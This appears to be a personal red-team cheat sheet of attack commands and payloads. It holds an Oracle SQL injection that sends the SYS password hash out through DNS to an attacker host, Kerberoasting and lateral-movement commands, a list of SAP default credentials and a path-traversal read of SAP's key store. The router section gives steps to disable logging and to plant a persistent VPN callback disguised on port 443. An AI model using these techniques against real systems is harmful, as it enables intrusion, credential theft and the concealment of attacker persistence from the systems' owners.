1337 Hacking Skillz
Table of contents
- Getting shells
- SSH User Enumeration
- SQL Injection
- Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net
- Windows Stuff
- SAP
- AWS
- Google/Bing dorks
- Redteam
- Mikrotik / Winbox
Getting shells
Interactive reverse shell with Python
python -c 'import pty; pty.spawn("/bin/bash")'
SSH User Enumeration
http://seclists.org/oss-sec/2018/q3/125
SQL Injection
Anything SQL Injection related should go here.
SQL Injection retrieval via DNS
This can be used against Oracle. Change the .attacker.com to a hostname you control.
SELECT title, publisher FROM books WHERE publisher = 'xpto'||UTL_INADDR.GET_HOST_NAME((SELECT%20PASSWORD%20FROM%20DBA_USERS%20WHERE%20USERNAME='SYS')||'.attacker.com')--
Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net
Windows Stuff
Impacket
In order to use this, we need at least one valid DC user.
GetUserSPMs.py - retrieves principal names from the DC
GetUserSPMs.py -request -dc-ip [domain-controller-ip] domain/username > hashes.txt
The retrieved hashes can be cracked with hashcat using -m 13100 (Kerberos TGS e23)
After you get the passwords, get the hostnames that are in the hashes.txt file and see if you can connect to some of them using the cracked passwords. Use smbclient.py for that.
smbclient.py "domain.com/username@server"
Use the shares command to see the available shares. Use the use command to connect to a share. Ideally we want to connect to the admin$ share to see if the user we have is an administrator on that box or not.
After this, you can use wmiexec.py to get an interactive shell in the remote machine if you have an admin user.
wmiexec.py "domain.com/username@server"
In this shell, you can try to get the name of the users in the “Domain Admins” group, with the following command:
net group "Domain Admins" /domain
If the user you have is there, then you are done :D
Bloodhound
apt install bloodhound neo4j
This thing is loud. Use the following bash function to launch it:
# run neo4j and bloodhound
bhound() {
echo "[+] running neo4j at process id:"
neo4j console 1>/dev/null 2>/dev/null &
echo ""
echo "[+] remember to change pass at localhost:7474"
echo "[+] if bloodhound looks goofed up, hit Ctrl+R"
echo ""
echo "[+] ingestors:"
echo "[*] /usr/lib/bloodhound/resources/app/Ingestors/SharpHound.exe"
echo "[*] /usr/lib/bloodhound/resources/app/Ingestors/SharpHound.ps1"
bloodhound
}
Finding the domain controller
Find the Domain Controllers in the network
dig -t ANY _ldap._tcp.dc._msdcs.example.com
Change example.com with the hostname used in the network.
Things to do in a windows box
List users in the box
net users
List processes running
tasklist.exe
List the services that are running
sc query type= service
Stop a service
sc stop ServiceNameHere
If the above does not work, try:
runas /user:Administrator sc stop ServiceNameHere
Is the service marked as non stoppable?
Change it’s configuration so it won’t automatically start and then kill the process associated with the service.
TODO: write down the commands here to do that.
SAP
I don’t know much about SAP. The links below have some ideas on things to do against it:
- My SAP Adventures
- http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/EN%20-%20SAP%20Penetration%20Testing%20Using%20Metasploit.pdf
Default credentials
- SAP* 06071992
- SAP* PASS
- DDIC 19920706
- DDIC Welcome01
- SAPCPIC ADMIN
- EARLYWATCH SUPPORT
- TMSADM PASSWORD
- TMSADM ADMIN
- TMSADM $1Pawd2&
- ADMIN welcome
- ADSUSER ch4ngeme
- ADS_AGENT ch4ngeme
- DEVELOPER ch4ngeme
- J2EE_ADMIN ch4ngeme
- SAPJSF ch4ngeme
- SAPR3 SAP
- CTB_ADMIN sap123
- XMI_DEMO sap123
- IDEADM admin
- SMD_ADMIN init1234
- SMD_BI_RFC init1234
- SMD_RFC init1234
- SOLMAN_ADMIN init1234
- SOLMAN_BTC init1234
- SAPSUPPORT init1234
- CONTENTSERV init1234
- SMD_AGT init1234
File paths
https://nest.parrotsec.org/security-tools/metasploit-framework/raw/36bae4066a05b66f2f572082d42e3b23f1e9c52d/data/wordlists/sap_icm_paths.txt
Arbitrary file read
http://sap_server/scheduler/ -> Check the source of the page looking for UIUtilJavaScriptJS. Parameter to this endpoint can be used to read arbitrary files. For example:
UIUtilJavaScriptJS?../../../../../../../../../../../sap/DM0/SYS/global/security/data/SecStore.key
UIUtilJavaScriptJS?../../../../../../../../../../sap/DM0/SYS/global/security/data/SecStore.properties
Decrypt the SecStore.key file to get admin creds.
AWS
Check the aws-downloader.py script
Google/Bing dorks
- site:s3.mazonaws.com users.txt
- site:s3.mazonaws.com companyname
Redteam
OSInt / Reconnaissance
Find subdomains:
- Certificate Transparency log search. https://github.com/UnaPibaGeek/ctfr
- DNS brute-force (TKTK: URL to my brute-force list)
- ARIN Ranges - https://whois.arin.net/ui/query.do?queryinput=*example.com
- Google Dorks
Find files / sensitive data:
- AWS S3 buckets - https://buckets.grayhatwarfare.com/
- Google Dorks
Find credentials
- Data breaches
- Pastebin
Post-exploitation
Gather passwords
Firefox
Find files key4.db and logins.json.
Click the hamburger menu and then click “Logins and Passwords”
Edge
TODO
Internet Explorer
TODO
Chrome
Device logs: Access chrome://device-log
Stored passwords: Access chrome://settings/passwords
If the above does not work, the following might:
See stored passwords:
* Open Chrome.
* On the right side of the toolbar, click the circular Profile, then click Passwords.
* From there, you can view, delete, or export your saved passwords.
* View saved passwords: Click the eye icon to the right of each password to see it. You’ll be prompted to type your computer password in to see it in plain text.
* Delete saved passwords: Click the three vertical dots to the right of each password, then click Remove.
* Export saved passwords: To the right of “Saved Passwords,” click the three vertical dots, and click Export passwords.
Mikrotik / Winbox
There is a vulnerability on RouterOS that allows credentials to be retrieved from the router. You just need to be in the same network as the router and the exploit is executed on Layer (no need to have an IP address).
If you are sure that the router you are targeting is vulnerable but the exploit is not working, try changing your MAC address to a Mikrotik one (just clone the router’s MAC address and change the value of the last octect).
Exploit here: https://github.com/BasuCert/WinboxPoC And here: https://github.com/hackerhouse-opensource/exploits/blob/master/mikrotik-jailbreak.txt
Disable logging
First thing to do as soon as you gain access to the router is disable logging:
/system logging
print
Replace X with the number of the logging entry in the table reported by the print command.
set X disabled=yes
Adding a VPN for persistence
In order to keep persistence in the router, a cool way to do it is to have the router connect back to an OpenVPN server you own and make sure that SSH is running on the Mikrotik router so you can connect back to it from the VPN.
Run the OpenVPN server on port 443 in order to make it less suspicious.
Here is the command to create the VPN:
/interface ovpn-client
add connect-to=IP_OpenVPN_Server mac-address=FE:A8:8E:09:CA:A0 name=ovpn-out1 password=OpenVPNpassword port=443 user=OpenVPNuser
If that does not work, there might be a firewall configured blocking access. Try the following commands to see if it opens up:
/ip firewall address-list
add address=YourIP list=default_management
add address=RoutersVPNip list=default_management
/ip firewall filter
add action=accept chain=forward comment="default configuration" src-address-list=default_management